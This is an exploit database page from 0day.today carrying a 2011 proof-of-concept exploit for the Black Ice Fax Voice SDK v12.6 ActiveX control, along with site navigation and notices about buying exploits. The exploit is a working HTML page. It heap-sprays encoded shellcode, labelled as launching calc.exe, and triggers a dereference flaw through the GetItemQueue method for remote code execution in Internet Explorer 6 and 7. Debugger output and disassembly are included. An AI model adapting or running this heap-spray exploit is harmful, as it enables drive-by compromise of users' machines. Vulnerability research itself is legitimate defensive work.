0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Black Ice Fax Voice SDK v12.6 Remote Code Execution
[<html>
<!--
Black Ice Fax Voice SDK v12.6 - integer dereference code execution exploit
Date: Jun 20, 2011
Link: http://www.blackice.com/Fax%20C++%20ActiveX.htm
Version: 12.6
Tested on: WinXP - IE 6 & 7
Class FAX
GUID: {2E980303-C865-11CF-BA24-444553540000}
Number of Interfaces: 1
Default Interface: _DFAX
RegKey Safe for Script: False
RegkeySafe for Init: False
KillBitSet: False
Meh, despite the above, i found this bug slightly amusing >:)
Theres an integer overflow in this section of fax.ocx which is how i found the dereference vulnerability.
1000CFA3 MOV ECX,[EBP+8] < --- get our variable into ECX
1000CFA6 MOV EDX,[ECX] < --- dereference
1000CFA8 MOV ECX,[EBP+8] < --- get our variable into ECX again (meh)
1000CFAB CALL [EDX+14] < --- !!!!
and...
EIP 1000CFA6 -> 51EC8B55
EAX 1000CF82 -> 51EC8B55
EBX 0013EC68 -> 01D29E90
ECX FFFFFFFF
EDX 73F360D3 -> EB0C4589
EDI 0013EB98 -> 73F4D682
ESI 00000000
EBP 0013EB94 -> 0013EC10
ESP 0013EB90 -> 0003A1A0
vulnerable methods:
GetFirstItem()
GetItemQueue()
prob more.
-->
<object classid='clsid:2E980303-C865-11CF-BA24-444553540000' id='target'/></object>
<script language='javascript'>
// Calc.exe
var shellcode = unescape(
'%uc931%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u3d13%u5e46%u8395'+
'%ufceb%uf4e2%uaec1%u951a%u463d%ud0d5%ucd01%u9022%u4745%u1eb1'+
'%u5e72%ucad5%u471d%udcb5%u72b6%u94d5%u77d3%u0c9e%uc291%ue19e'+
'%u873a%u9894%u843c%u61b5%u1206%u917a%ua348%ucad5%u4719%uf3b5'+
'%u4ab6%u1e15%u5a62%u7e5f%u5ab6%u94d5%ucfd6%ub102%u8539%u556f'+
'%ucd59%ua51e%u86b8%u9926%u06b6%u1e52%u5a4d%u1ef3%u4e55%u9cb5'+
'%uc6b6%u95ee%u463d%ufdd5%u1901%u636f%u105d%u6dd7%u86be%uc525'+
'%u3855%u7786%u2e4e%u6bc6%u48b7%u6a09%u25da%uf93f%u465e%u955e'
);
var nops = unescape('%u0a0a%u0a0a');
var headersize = 20;
var slackspace = headersize + shellcode.length;
while(nops.length < slackspace) {
nops += nops;
}
var fillblock = nops.substring(0, slackspace);
var block = nops.substring(0, nops.length - slackspace);
while((block.length + slackspace) < 0x50000) {
block = block + block + fillblock;
}
memory=new Array();
for(counter=0; counter<200; counter++){
memory[counter] = block + shellcode;
}
var boom = 168430090; // 0x0a0a0a0a
target.GetItemQueue(boom);
</script>
</html>
# 0day.today [2024-11-16] #